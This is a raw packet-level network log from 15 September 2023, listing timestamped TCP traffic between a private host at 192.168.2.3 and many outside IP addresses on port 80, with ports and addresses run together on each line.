                                                                                                                                                                              Sep 15, 2023 07:26:42.908539057 CEST4988880192.168.2.3208.109.214.162
                                                                                                                                                                              Sep 15, 2023 07:26:42.915020943 CEST8049887211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.915127993 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:42.915549994 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:43.047956944 CEST8049889213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.048156977 CEST4988980192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:43.048717022 CEST4988980192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:43.066879988 CEST8049888208.109.214.162192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.067502975 CEST8049888208.109.214.162192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.067584991 CEST4988880192.168.2.3208.109.214.162
                                                                                                                                                                              Sep 15, 2023 07:26:43.090606928 CEST4988880192.168.2.3208.109.214.162
                                                                                                                                                                              Sep 15, 2023 07:26:43.182327032 CEST8049887211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.182347059 CEST8049887211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.182441950 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:43.203635931 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:43.216409922 CEST8049889213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.216428995 CEST8049889213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.216443062 CEST8049889213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.216623068 CEST4988980192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:43.216623068 CEST4988980192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:43.249932051 CEST8049888208.109.214.162192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.250006914 CEST4988880192.168.2.3208.109.214.162
                                                                                                                                                                              Sep 15, 2023 07:26:43.318043947 CEST8049850213.186.33.40192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.318097115 CEST4985080192.168.2.3213.186.33.40
                                                                                                                                                                              Sep 15, 2023 07:26:43.470439911 CEST8049887211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.470618010 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:43.506422997 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.603873968 CEST8049890192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.603957891 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.604532003 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.640117884 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:43.701633930 CEST8049890192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.701994896 CEST8049890192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.702064037 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.724637985 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.730581045 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.730676889 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:43.731128931 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:43.821156025 CEST8049890192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:43.821228981 CEST4989080192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:43.821418047 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.041222095 CEST804987293.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.041290045 CEST4987280192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:44.180416107 CEST4989280192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:44.271517992 CEST8049892172.67.173.200192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.271754980 CEST4989280192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:44.271940947 CEST4989280192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:44.362754107 CEST8049892172.67.173.200192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.374970913 CEST8049892172.67.173.200192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.375041962 CEST4989280192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:44.461091042 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.527616978 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:44.576306105 CEST804989366.94.119.160192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.576450109 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.576828957 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.691816092 CEST804989366.94.119.160192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.692528963 CEST804989366.94.119.160192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.692625046 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.692704916 CEST804989469.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.692909956 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:44.706871986 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:44.707917929 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.823431969 CEST804989366.94.119.160192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.823637962 CEST4989380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:44.883363962 CEST804989469.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.883404970 CEST804989469.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:44.883464098 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:44.897818089 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:45.061677933 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.061728954 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.061777115 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.061815023 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062453985 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062491894 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062527895 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062604904 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062629938 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062654018 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062715054 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062743902 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062783957 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062797070 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062822104 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062832117 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062859058 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.062871933 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062906981 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.062993050 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.063030005 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.063056946 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.063076973 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.075911999 CEST804989469.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.075978041 CEST4989480192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:45.153552055 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.153565884 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.153588057 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.153848886 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.153848886 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154203892 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154294014 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154376984 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154376984 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154403925 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154417038 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154428959 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154464960 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154493093 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154530048 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154541016 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154577017 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154606104 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154654026 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154663086 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154702902 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154710054 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154747963 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154772043 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154809952 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154819965 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154856920 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154881001 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154927969 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.154951096 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.154999971 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155024052 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155075073 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155652046 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155786037 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155795097 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155823946 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155834913 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155874014 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155895948 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155935049 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.155940056 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.155980110 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.240454912 CEST4989580192.168.2.3122.128.109.107
                                                                                                                                                                              Sep 15, 2023 07:26:45.246442080 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.246619940 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.246624947 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.246678114 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.246700048 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.246747971 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.246880054 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.246968985 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247040987 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247055054 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247117043 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247176886 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247616053 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247694969 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247766972 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247806072 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247838974 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247869015 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.247921944 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247970104 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.247978926 CEST4989680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:45.247981071 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248035908 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248107910 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248215914 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248255014 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248313904 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248368979 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248439074 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248564959 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248673916 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248735905 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248749971 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248785973 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248802900 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248826981 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.248925924 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.248969078 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249021053 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249068022 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249125957 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249186993 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249243975 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249284029 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249342918 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249353886 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249417067 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249423981 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249463081 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249475956 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249519110 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249623060 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249726057 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249809980 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249861002 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249911070 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.249975920 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.249993086 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250122070 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250145912 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250202894 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250241041 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250296116 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250324965 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250364065 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250375986 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250411034 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250652075 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250819921 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250904083 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250947952 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.250960112 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.250989914 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.251080990 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.251138926 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.251185894 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.251281977 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.251322031 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.251377106 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.251404047 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.251449108 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.251455069 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.251494884 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341073990 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341212034 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341226101 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341237068 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341294050 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341295004 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341326952 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341360092 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341384888 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341412067 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341420889 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341427088 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341454983 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341479063 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341501951 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341545105 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341572046 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341584921 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341614962 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341634035 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341697931 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341737032 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341747999 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341774940 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341779947 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341814041 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341825962 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341856956 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341902971 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341943979 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341958046 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.341980934 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.341995955 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342020035 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342030048 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342063904 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342104912 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342143059 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342154980 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342181921 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342187881 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342228889 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342252016 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342292070 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342298031 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342329025 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342345953 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342370987 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342377901 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342422962 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342442989 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342480898 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342493057 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342518091 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342525959 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342564106 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342587948 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342626095 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342632055 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342663050 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342674017 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342708111 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342735052 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342772961 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342782974 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342814922 CEST4989180192.168.2.3172.67.70.223
                                                                                                                                                                              Sep 15, 2023 07:26:45.342842102 CEST8049891172.67.70.223192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:45.342889071 CEST4989180192.168.2.3172.67.70.223
